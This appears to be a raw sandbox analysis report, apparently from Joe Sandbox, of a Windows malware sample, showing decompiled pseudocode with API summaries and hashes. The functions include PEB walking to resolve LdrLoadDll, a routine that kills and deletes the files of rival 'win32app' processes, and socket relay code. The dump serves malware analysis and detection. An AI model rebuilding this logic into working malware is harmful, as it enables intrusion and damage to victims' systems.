                        							}
                        							goto L26;
                        						}
                        						__eflags = _v84 - 0x90321;
                        						if(_v84 != 0x90321) {
                        							__eflags = _t86;
                        							if(_t86 != 0) {
                        								goto L28;
                        							}
                        							goto L14;
                        						}
                        						goto L28;
                        						L26:
                        						__eflags = _v84 - 0x90312;
                        					} while (__eflags == 0);
                        					L29:
                        					E00404681( &_v8);
                        					return _v88;
                        				}
                        			}


































                        0x0040436d
                        0x00404377
                        0x0040437c
                        0x0040437f
                        0x00404392
                        0x00404399
                        0x00404532
                        0x00404535
                        0x0040453a
                        0x00000000
                        0x0040439f
                        0x0040439f
                        0x0040439f
                        0x004043a2
                        0x004043a2
                        0x004043a2
                        0x004043a6
                        0x004043b1
                        0x004043b4
                        0x004043ba
                        0x004043bf
                        0x00000000
                        0x00000000
                        0x004043c1
                        0x004043d9
                        0x00000000
                        0x004043df
                        0x00000000
                        0x004043df
                        0x004043d9
                        0x004043e8
                        0x004043ed
                        0x004043ef
                        0x00000000
                        0x00000000
                        0x004043f5
                        0x004043f5
                        0x004043f5
                        0x004043f5
                        0x00404402
                        0x00404407
                        0x00404418
                        0x0040441d
                        0x00404424
                        0x0040442b
                        0x00404432
                        0x00404439
                        0x00404440
                        0x00404447
                        0x0040444e
                        0x00404455
                        0x0040445f
                        0x00404462
                        0x00404469
                        0x00404470
                        0x00404472
                        0x00404474
                        0x00404477
                        0x00404478
                        0x0040447b
                        0x00404480
                        0x00404483
                        0x00404483
                        0x00404490
                        0x00404497
                        0x004044b0
                        0x004044b0
                        0x004044b7
                        0x0040451e
                        0x0040451e
                        0x00404521
                        0x00000000
                        0x00000000
                        0x004044c1
                        0x004044c5
                        0x004044c9
                        0x004044ef
                        0x004044ef
                        0x004044f3
                        0x004044f5
                        0x004044f9
                        0x004044fb
                        0x004044fe
                        0x00404508
                        0x00404508
                        0x00404508
                        0x0040450b
                        0x00404518
                        0x00404518
                        0x004044fe
                        0x004044f9
                        0x0040451d
                        0x0040451d
                        0x0040451d
                        0x00000000
                        0x0040451d
                        0x004044cb
                        0x004044cf
                        0x00000000
                        0x00000000
                        0x004044d1
                        0x004044d4
                        0x00000000
                        0x00000000
                        0x004044df
                        0x004044e4
                        0x004044e6
                        0x00000000
                        0x00000000
                        0x004044ea
                        0x00000000
                        0x004044ea
                        0x00000000
                        0x0040451e
                        0x00404499
                        0x004044a0
                        0x004044a7
                        0x004044aa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004044aa
                        0x00000000
                        0x00404523
                        0x00404523
                        0x00404523
                        0x00404541
                        0x00404545
                        0x00404551
                        0x00404551

                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,00000004,?,?,?,?,00000003), ref: 00404392
                        • DecryptMessage.SECUR32(?,?,00000000,00000000,?,?,00000004,?,?,00000004,?,?,?,00000000,00000000,?), ref: 0040447B
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: AllocDecryptMessageVirtual
                        • String ID:
                        • API String ID: 2757997683-0
                        • Opcode ID: 5c94857fa039f189af9300c0447536030e9805e17b1e6dea6593ef5f43fbf839
                        • Instruction ID: c4f076050abf727d3341b438205accb6db636bad67efbee14f2a9a5a3b96c47f
                        • Opcode Fuzzy Hash: 5c94857fa039f189af9300c0447536030e9805e17b1e6dea6593ef5f43fbf839
                        • Instruction Fuzzy Hash: E85109B1900208EBDF24DF91C845BAEB7B8EF84308F10442EE751762D0D7799A58DB59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 40%
                        			E00405F54(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v12;
                        				char _v24;
                        				char* _t12;
                        				char* _t13;
                        
                        				E0040621F(_a4, 0,  &_v24, _a16, 0);
                        				_t13 =  &_v12;
                        				if(_a16 == 0) {
                        					_t13 = 0;
                        				}
                        				_push(_t13);
                        				_push(0);
                        				_push(0);
                        				_t12 =  &_v24;
                        				_push(_t12);
                        				_push(0);
                        				L00406A24();
                        				if(_t12 == 1) {
                        					_push(0);
                        					_push(_a12);
                        					_push(_a8);
                        					_push(_a4);
                        					L00406A1E();
                        					return _t12;
                        				}
                        				return _t12;
                        			}







                        0x00405f6b
                        0x00405f70
                        0x00405f77
                        0x00405f79
                        0x00405f79
                        0x00405f7b
                        0x00405f7c
                        0x00405f7e
                        0x00405f80
                        0x00405f83
                        0x00405f84
                        0x00405f86
                        0x00405f8e
                        0x00405f90
                        0x00405f92
                        0x00405f95
                        0x00405f98
                        0x00405f9b
                        0x00000000
                        0x00405f9b
                        0x00405fa4

                        APIs
                        • select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?,00000003), ref: 00405F86
                        • recv.WSOCK32(?,?,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00405F9B
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: recvselect
                        • String ID:
                        • API String ID: 741273618-0
                        • Opcode ID: 97f53a0d5a20950b3a15b2b02d2f26d09f9fd88d3e392bcfedc6ae2eac7ae7d6
                        • Instruction ID: 469decef5706fd9177a6baefe362b40db246d05773b7a94ce7c7f39050bfd426
                        • Opcode Fuzzy Hash: 97f53a0d5a20950b3a15b2b02d2f26d09f9fd88d3e392bcfedc6ae2eac7ae7d6
                        • Instruction Fuzzy Hash: 04F05E3164020E7AEF10EE85DD42FEF3B6DEB81754F108026FA05B90D0D7B59A608A69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E00406698(intOrPtr _a4) {
                        				char* _v8;
                        				short _v10;
                        				char _v12;
                        				char _v16;
                        				char _v268;
                        				char _v272;
                        				char _v1296;
                        				intOrPtr _t31;
                        				intOrPtr _t34;
                        				short _t37;
                        				intOrPtr _t45;
                        				void* _t48;
                        				char* _t49;
                        				intOrPtr* _t50;
                        				intOrPtr* _t51;
                        				void* _t52;
                        
                        				E00406259( &_v1296,  &_v16 - _t52);
                        				E00406270(_a4, 0xffffffff,  &_v1296);
                        				_t49 =  &_v1296;
                        				_t31 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                        				_t51 =  *((intOrPtr*)(_t31 + 0xc));
                        				_t45 =  *((intOrPtr*)(_t31 + 0x10));
                        				do {
                        					_t51 =  *_t51;
                        					_t50 =  *((intOrPtr*)(_t51 + 0x30));
                        					_t48 = 0;
                        					while( *((char*)(_t48 + _t49)) != 0) {
                        						_t34 =  *_t50;
                        						if(_t34 < 0x41 || _t34 > 0x5a) {
                        							__eflags = _t34 - 0x61;
                        							if(__eflags >= 0) {
                        								__eflags = _t34 - 0x7a;
                        								if(__eflags <= 0) {
                        									_t34 = _t34 - 0x20;
                        									__eflags = _t34;
                        								}
                        							}
                        						} else {
                        							_t34 = _t34 + 0x20;
                        						}
                        						if( *((intOrPtr*)(_t48 + _t49)) == _t34 ||  *((intOrPtr*)(_t48 + _t49)) == _t34) {
                        							_t50 = _t50 + 2;
                        							_t48 = _t48 + 1;
                        							continue;
                        						} else {
                        							goto L11;
                        						}
                        					}
                        					return  *((intOrPtr*)(_t51 + 0x18));
                        					L11:
                        					_t60 = _t51 - _t45;
                        				} while (_t51 != _t45);
                        				_t37 = E00406460(_t60,  &_v1296,  &_v268);
                        				_v12 = _t37;
                        				_v10 = _t37;
                        				_v10 = _v10 + 2;
                        				_v8 =  &_v268;
                        				_v272 = 0;
                        				_push( &_v272);
                        				_push( &_v12);
                        				_push(0);
                        				_push(0);
                        				 *((intOrPtr*)(E00406788(_t60, E00406698("ntdll.dll"), "LdrLoadDll")))();
                        				return _v272;
                        			}



















                        0x004066af
                        0x004066c0
                        0x004066c5
                        0x004066d1
                        0x004066d4
                        0x004066d7
                        0x004066da
                        0x004066da
                        0x004066dc
                        0x004066df
                        0x004066e1
                        0x004066ed
                        0x004066f1
                        0x004066fc
                        0x004066fe
                        0x00406700
                        0x00406702
                        0x00406704
                        0x00406704
                        0x00406704
                        0x00406702
                        0x004066f7
                        0x004066f7
                        0x004066f7
                        0x0040670a
                        0x00406713
                        0x00406716
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040670a
                        0x00000000
                        0x00406711
                        0x00406719
                        0x00406719
                        0x0040672b
                        0x00406730
                        0x00406734
                        0x00406738
                        0x00406743
                        0x00406746
                        0x00406756
                        0x0040675a
                        0x0040675b
                        0x0040675d
                        0x00406774
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrLoadDll$ntdll.dll
                        • API String ID: 0-2564759627
                        • Opcode ID: fc9e9e62f03503c3b8a199c7c69aecf19c7e0107366dbd7550c0934bc82d2440
                        • Instruction ID: e6d49e0388bafc491964756e31d7199eaa49e47e51a7015218bf12175498275a
                        • Opcode Fuzzy Hash: fc9e9e62f03503c3b8a199c7c69aecf19c7e0107366dbd7550c0934bc82d2440
                        • Instruction Fuzzy Hash: 3F2106759002189BCB20DB94CC44FCAB3B8EB05318F1144FBD486B72C1D638AA568F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B11000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b11000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: r
                        • API String ID: 0-1812594589
                        • Opcode ID: c58a95ee65e0c40c98ed7f75d33c1996f27fe6966749b8bd0e8a38d74666dde0
                        • Instruction ID: 768811e2ed6313e84d33d30ed86ad829293885878128bcc4a1f5815eec6f3b23
                        • Opcode Fuzzy Hash: c58a95ee65e0c40c98ed7f75d33c1996f27fe6966749b8bd0e8a38d74666dde0
                        • Instruction Fuzzy Hash: B0A2418A80E7C05FE7038B35282A6957FB55E27254B4F14D7C0A4CF2B3E4084A5EEB76
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00864150
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: f4165d4c170c6d4e9428747cdf0b0da8e271c0f524917755f37f749a58f2d512
                        • Instruction ID: e40dc385619524317757ca5f890b82c56a950bf76cd20f64f8eee09918f1cdab
                        • Opcode Fuzzy Hash: f4165d4c170c6d4e9428747cdf0b0da8e271c0f524917755f37f749a58f2d512
                        • Instruction Fuzzy Hash: 3431E732A403187AEF21DA64CC46FEE777DFF44304F1500A5BA24E21C2EF709A908B61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 008617A8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 008617DC
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,00000000,?), ref: 0086295B
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$BinaryString$ContextRelease
                        • String ID:
                        • API String ID: 1374739491-0
                        • Opcode ID: 7e85fd0953a87749d06ea8a06f95dd2e5f16c23cd80c068d8355f0faf534fb09
                        • Instruction ID: 552bd4155c245596415f0e924e5d054cbaafb015b1bd44e257367407ea0dec7d
                        • Opcode Fuzzy Hash: 7e85fd0953a87749d06ea8a06f95dd2e5f16c23cd80c068d8355f0faf534fb09
                        • Instruction Fuzzy Hash: 28215371D40258AADF20ABE8CD0AFDC76B8FF44704F2144A6F544F2081DF7A9A949F26
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E004065B9(signed int __eax, signed int _a4) {
                        				signed int _t8;
                        				void* _t13;
                        				signed int _t15;
                        
                        				asm("rdtsc");
                        				_push(_t13);
                        				_push(_t15);
                        				asm("rcr eax, 0x10");
                        				_t8 = 0x3cfb5543 + __eax * 0x1e7319 + _t13;
                        				if(_t15 != 0) {
                        					_t8 = _t8 * _t15;
                        				}
                        				return _t8 * _a4 >> 0x20;
                        			}






                        0x004065b9
                        0x004065bf
                        0x004065c0
                        0x004065ce
                        0x004065d1
                        0x004065d5
                        0x004065d7
                        0x004065d7
                        0x004065e7

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID:
                        • String ID: llfujo
                        • API String ID: 0-2623408462
                        • Opcode ID: 1f89aef79ef7b5cb9e09e9803b4407ea6ad23b4a41ae40ae392cbca8b0574f67
                        • Instruction ID: f79e77312dda7801166e91471ef17651793d1126662eb812a09b32dd190a71af
                        • Opcode Fuzzy Hash: 1f89aef79ef7b5cb9e09e9803b4407ea6ad23b4a41ae40ae392cbca8b0574f67
                        • Instruction Fuzzy Hash: 13D0127B7041162BB70C504FAD068A7665FC1D1268318D437A901D4295F551DA450174
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5fd5109339da8b0c2b87d72ad57743204797d109e28c7542155406389c36da11
                        • Instruction ID: 56fb727fd1f235365da722911c34b012543e13a20f2ad85a0caa692638040f02
                        • Opcode Fuzzy Hash: 5fd5109339da8b0c2b87d72ad57743204797d109e28c7542155406389c36da11
                        • Instruction Fuzzy Hash: 06212672904298AFCF20DB68C840FCDBBB8FF05310F1140AAE881E7242E734AA568F55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B11000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b11000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 8eae3c5efb045740c8a8c88ec8d72fe2adbfc09a30619a3ca41bd1624f5c1728
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: E11170723401009FEB44DF59DCD1FE673EAEB88360B698195ED04CB356D675E842C760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                        • Instruction ID: 82ac322a432def8823af1ef6bf0ec9fd1c2c2f3d91b00de5130ce069845b05cd
                        • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                        • Instruction Fuzzy Hash: 99F0CD76A006089FDB21CFA4D845BAE73F9FB88315F0547A4D80AD7282D330ED428F94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E0040593C(void* __eflags, struct HWND__* _a4) {
                        				char _v16;
                        				char _v260;
                        				char _v516;
                        				long _v520;
                        				char _v648;
                        				char* _v652;
                        				intOrPtr _v656;
                        				void* _v660;
                        				void* _v664;
                        				int _t35;
                        				void* _t38;
                        				void* _t47;
                        				CHAR* _t48;
                        				int _t50;
                        				void* _t57;
                        				void* _t58;
                        				void* _t60;
                        
                        				E00406259( &_v664,  &_v16 - _t60);
                        				GetWindowThreadProcessId(_a4,  &_v520);
                        				if(_v520 != GetCurrentProcessId()) {
                        					GetClassNameA(_a4,  &_v260, 0x100);
                        					_t35 = GetWindowTextA(_a4,  &_v516, 0x100);
                        					_t63 = _t35;
                        					if(_t35 != 0) {
                        						_t38 = E004064AD(_t63, "win32app",  &_v260);
                        						_t64 = _t38;
                        						if(_t38 != 0 && E004064AD(_t64, "Microsoft",  &_v516) != 0) {
                        							_t57 = 0x80;
                        							do {
                        								_t40 = E004065B9(_t40, 0x80);
                        								asm("stosb");
                        								_t57 = _t57 - 1;
                        							} while (_t57 != 0);
                        							_v660 = E004065B9(_t40, 0xee6b2800);
                        							_v656 = E004065B9(_t41, 0x80) + 1;
                        							_v652 =  &_v648;
                        							SendMessageA(_a4, 0x4a, 0,  &_v660);
                        							_t47 = OpenProcess(0x410, 0, _v520);
                        							if(_t47 != 0) {
                        								_v664 = _t47;
                        								_push(0x100);
                        								_t48 =  &_v260;
                        								_push(_t48);
                        								_push(0);
                        								_push(_v664);
                        								L00406AC0();
                        								if(_t48 != 0) {
                        									Sleep(0x3e8);
                        									_t50 = DeleteFileA( &_v260);
                        									_t69 = _t50;
                        									if(_t50 != 0) {
                        										_t58 = E00406492(_t69,  &_v260);
                        										while(1) {
                        											_t58 = _t58 - 1;
                        											if(_t58 == 0) {
                        												goto L13;
                        											}
                        											if( *[ss:ecx+ebp-0x100] != 0x5c) {
                        												continue;
                        											} else {
                        												 *[ss:ecx+ebp-0x100] = 0;
                        												RemoveDirectoryA( &_v260);
                        											}
                        											goto L13;
                        										}
                        									}
                        								}
                        							}
                        						}
                        					}
                        				}
                        				L13:
                        				return 1;
                        			}




















                        0x00405953
                        0x00405962
                        0x00405972
                        0x00405987
                        0x0040599b
                        0x004059a0
                        0x004059a2
                        0x004059b4
                        0x004059b9
                        0x004059bb
                        0x004059e0
                        0x004059e5
                        0x004059ea
                        0x004059ef
                        0x004059f0
                        0x004059f0
                        0x004059fd
                        0x00405a0e
                        0x00405a1a
                        0x00405a2e
                        0x00405a40
                        0x00405a47
                        0x00405a49
                        0x00405a4f
                        0x00405a54
                        0x00405a5a
                        0x00405a5b
                        0x00405a5d
                        0x00405a63
                        0x00405a6a
                        0x00405a71
                        0x00405a7d
                        0x00405a82
                        0x00405a84
                        0x00405a92
                        0x00405a94
                        0x00405a94
                        0x00405a95
                        0x00000000
                        0x00000000
                        0x00405aa0
                        0x00000000
                        0x00405aa2
                        0x00405aa2
                        0x00405ab2
                        0x00405ab2
                        0x00000000
                        0x00405aa0
                        0x00405a94
                        0x00405a84
                        0x00405a6a
                        0x00405a47
                        0x004059bb
                        0x004059a2
                        0x00405ab7
                        0x00405ac0

                        APIs
                        • GetWindowThreadProcessId.USER32(?,?), ref: 00405962
                        • GetCurrentProcessId.KERNEL32(?,?), ref: 00405967
                        • GetClassNameA.USER32(?,?,00000100), ref: 00405987
                        • GetWindowTextA.USER32 ref: 0040599B
                        • SendMessageA.USER32(?,0000004A,00000000,?), ref: 00405A2E
                        • OpenProcess.KERNEL32(00000410,00000000,?,00000080,EE6B2800,00000080,Microsoft,?,win32app,?,?,?,00000100,?,?), ref: 00405A40
                        • GetModuleFileNameExA.PSAPI(?,00000000,?,00000100,00000410,00000000,?,00000080,EE6B2800,00000080,Microsoft,?,win32app,?,?,?), ref: 00405A63
                        • Sleep.KERNEL32(000003E8,?,00000000,?,00000100,00000410,00000000,?,00000080,EE6B2800,00000080,Microsoft,?,win32app,?,?), ref: 00405A71
                        • DeleteFileA.KERNEL32(?,000003E8,?,00000000,?,00000100,00000410,00000000,?,00000080,EE6B2800,00000080,Microsoft,?,win32app,?), ref: 00405A7D
                        • RemoveDirectoryA.KERNEL32(00000000), ref: 00405AB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Process$FileNameWindow$ClassCurrentDeleteDirectoryMessageModuleOpenRemoveSendSleepTextThread
                        • String ID: Microsoft$win32app
                        • API String ID: 934796723-2644191155
                        • Opcode ID: 0b87a9a00d354b46409895b4d87fc05f8e73b86ae0661e72651ec2bffa10af5f
                        • Instruction ID: 86328c1093061821a4371a1ac66eddd852efdd7a2fdcc86639292ee15b01066f
                        • Opcode Fuzzy Hash: 0b87a9a00d354b46409895b4d87fc05f8e73b86ae0661e72651ec2bffa10af5f
                        • Instruction Fuzzy Hash: 6D31A871A0021869EF21ABA1CC46FEA776CEF54304F0041BFB545F51C2EBB89E948F68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E004047BA(void* __eflags, intOrPtr _a4) {
                        				void* _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				void* _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				char _v32;
                        				char _v40;
                        				char _v41;
                        				char _v42;
                        				char _v43;
                        				char _v44;
                        				char _v45;
                        				char _v46;
                        				char _v47;
                        				char _v48;
                        				char _v49;
                        				signed int _v51;
                        				signed int _v52;
                        				char _v56;
                        				char _v60;
                        				char _v64;
                        				char _v68;
                        				char _v72;
                        				char _v76;
                        				intOrPtr _v88;
                        				short _v90;
                        				char _v92;
                        				char _v96;
                        				char _v112;
                        				char _v116;
                        				short _v118;
                        				char _v120;
                        				char _v128;
                        				char _v140;
                        				char _v144;
                        				intOrPtr _v148;
                        				intOrPtr _v152;
                        				char _v156;
                        				char _v160;
                        				signed short _t194;
                        				signed short _t206;
                        				char* _t215;
                        				char* _t220;
                        				intOrPtr _t229;
                        				signed int _t230;
                        				signed int _t233;
                        				intOrPtr* _t238;
                        				char* _t240;
                        				intOrPtr _t241;
                        				intOrPtr _t242;
                        				void* _t244;
                        
                        				E00406259( &_v160,  &_v16 - _t244);
                        				_t241 = _a4;
                        				E004061D2(_t241 + 0x180,  &_v32, 4);
                        				E004061D2(_t241 + 0x184,  &_v16, 4);
                        				E004061D2(_t241 + 0x188,  &_v24, 4);
                        				E004061D2(_t241 + 0x18c,  &_v8, 4);
                        				E004061D2(_t241 + 0x190,  &_v20, 4);
                        				E004061D2(_t241 + 0x194,  &_v56, 4);
                        				E004061D2(_t241 + 0x198,  &_v64, 4);
                        				E004061D2(_t241 + 0x19c,  &_v68, 4);
                        				E004061D2(_t241 + 0x1a0,  &_v72, 4);
                        				E004061D2(_t241 + 0x1a4,  &_v76, 4);
                        				E004061D2(_t241 + 0x1a8,  &_v60, 4);
                        				_t233 = _v16;
                        				_t238 = _v8;
                        				_v28 =  *((intOrPtr*)(_t238 + _t233 * 4));
                        				_v12 =  *_t238;
                        				_v52 = _t233;
                        				_v51 = 0xa;
                        				_v49 = 5;
                        				_v48 = 1;
                        				_v47 = 0;
                        				_v46 = 1;
                        				_v45 = 0;
                        				_v44 = 0;
                        				_v43 = 0;
                        				_v42 = 0;
                        				_v41 = 0;
                        				_v40 = 0;
                        				_v92 = 2;
                        				_t246 =  *((char*)(_t241 + 7)) - 3;
                        				if( *((char*)(_t241 + 7)) != 3) {
                        					__eflags =  *((char*)(_t241 + 7)) - 1;
                        					if( *((char*)(_t241 + 7)) != 1) {
                        						__eflags =  *((char*)(_t241 + 7)) - 4;
                        						if( *((char*)(_t241 + 7)) != 4) {
                        							L14:
                        							_t242 = _v8;
                        							_t230 = _v16;
                        							E00405AC3(0x408089, 0x32,  &_v52, 3);
                        							E00405AC3(0x408089, 0x32,  &_v49, _v51 & 0x0000ffff);
                        							E00405F08(_v12, _v76, _v24,  &_v52, (_v51 & 0x0000ffff) + 3, _v72, _v68, _v64, 2, _v56, _v60);
                        							E00405AC3(0x408089, 0x32,  &_v52, 3);
                        							_t194 = E00405AC3(0x408089, 0x32,  &_v49, _v51 & 0x0000ffff);
                        							if(_v48 != 0) {
                        								L24:
                        								 *((intOrPtr*)(_t242 + _t230 * 4)) = 0;
                        								E0040603E(_t194, _v28);
                        								_v51 = 0;
                        								E00405AC3(0x408089, 0x32,  &_v52, 3);
                        								E00405F08(_v12, _v76, _v24,  &_v52, 3, _v72, _v68, _v64, 2, _v56, _v60);
                        								E00404681( &_v20);
                        								 *((intOrPtr*)(_v32 + _t230 * 4)) = 0;
                        								return 0;
                        							}
                        							_t240 = _v20;
                        							while(1) {
                        								L16:
                        								while( *((intOrPtr*)(_t242 + _t230 * 4)) != 0) {
                        									E0040621F(_v28, 0,  &_v140, 0, 0x64);
                        									_push( &_v128);
                        									_push(0);
                        									_push(0);
                        									_t194 =  &_v140;
                        									_push(_t194);
                        									_push(0);
                        									L00406A24();
                        									__eflags = _t194;
                        									if(__eflags == 0) {
                        										goto L16;
                        									}
                        									if(__eflags < 0) {
                        										goto L24;
                        									}
                        									_push(0);
                        									_push(0xfffa);
                        									_t206 = _t240 + 3;
                        									_push(_t206);
                        									_push(_v28);
                        									L00406A1E();
                        									_t194 = _t206;
                        									__eflags = _t194;
                        									if(_t194 == 0) {
                        										L21:
                        										goto L24;
                        									}
                        									__eflags = _t194 - 0xffffffff;
                        									if(_t194 != 0xffffffff) {
                        										 *(_t240 + 1) = _t194;
                        										 *_t240 = _v16;
                        										E00405AC3(0x408089, 0x32, _t240, 3);
                        										E00405AC3(0x408089, 0x32, _t240 + 3,  *(_t240 + 1) & 0x0000ffff);
                        										_t194 = E00405F08(_v12, _v76, _v24, _t240, ( *(_t240 + 1) & 0x0000ffff) + 3, _v72, _v68, _v64, 2, _v56, _v60);
                        										continue;
                        									}
                        									goto L21;
                        								}
                        								goto L24;
                        							}
                        						}
                        						_v120 = 0x17;
                        						_v116 = 0;
                        						_v96 = 0;
                        						_v118 =  *((intOrPtr*)(_t241 + 0x18));
                        						E004061D2(_t241 + 8,  &_v112, 0x10);
                        						L8:
                        						_v144 = 1;
                        						_t215 =  &_v144;
                        						_push(_t215);
                        						_push(0x8004667e);
                        						_push(_v28);
                        						L00406A18();
                        						if(_t215 == 0) {
                        							if( *((char*)(_t241 + 7)) == 4) {
                        								_push(0x1c);
                        								_push( &_v120);
                        								_push(_v28);
                        								L00406A00();
                        							} else {
                        								_push(0x10);
                        								_push( &_v92);
                        								_push(_v28);
                        								L00406A00();
                        							}
                        							E0040621F(_v28, 0,  &_v140, 0xa, 0);
                        							_push( &_v128);
                        							_push(0);
                        							_t220 =  &_v140;
                        							_push(_t220);
                        							_push(0);
                        							_push(0);
                        							L00406A24();
                        							if(_t220 == 1) {
                        								_v144 = 0;
                        								_push( &_v144);
                        								_push(0x8004667e);
                        								_push(_v28);
                        								L00406A18();
                        								_v156 = 1;
                        								_v152 = 0xea60;
                        								_v148 = 0x2710;
                        								_push(0);
                        								_push(0);
                        								_push( &_v160);
                        								_push(0);
                        								_push(0);
                        								_push(0xc);
                        								_push( &_v156);
                        								_push(0x98000004);
                        								_push(_v28);
                        								L00406A4E();
                        								_v48 = 0;
                        							}
                        						}
                        						goto L14;
                        					}
                        					_v88 =  *((intOrPtr*)(_t241 + 8));
                        					_v90 =  *((intOrPtr*)(_t241 + 0xc));
                        					goto L8;
                        				}
                        				_v90 =  *((intOrPtr*)(0 + _t241 + 9));
                        				 *((char*)(0 + _t241 + 9)) = 0;
                        				_t229 = E004060DF(_t246, _t241 + 9, 2);
                        				if(_t229 == 0) {
                        					goto L14;
                        				} else {
                        					_v88 = _t229;
                        					goto L8;
                        				}
                        			}























































                        0x004047d1
                        0x004047d6
                        0x004047e6
                        0x004047f8
                        0x0040480a
                        0x0040481c
                        0x0040482e
                        0x00404840
                        0x00404852
                        0x00404864
                        0x00404876
                        0x00404888
                        0x0040489a
                        0x0040489f
                        0x004048a2
                        0x004048a8
                        0x004048ad
                        0x004048b0
                        0x004048b3
                        0x004048b9
                        0x004048bd
                        0x004048c1
                        0x004048c5
                        0x004048c9
                        0x004048cd
                        0x004048d1
                        0x004048d5
                        0x004048d9
                        0x004048dd
                        0x004048e1
                        0x004048e7
                        0x004048eb
                        0x00404918
                        0x0040491c
                        0x0040492e
                        0x00404932
                        0x00404a45
                        0x00404a45
                        0x00404a48
                        0x00404a5c
                        0x00404a6d
                        0x00404a94
                        0x00404aa6
                        0x00404ab7
                        0x00404ac0
                        0x00404b7a
                        0x00404b7a
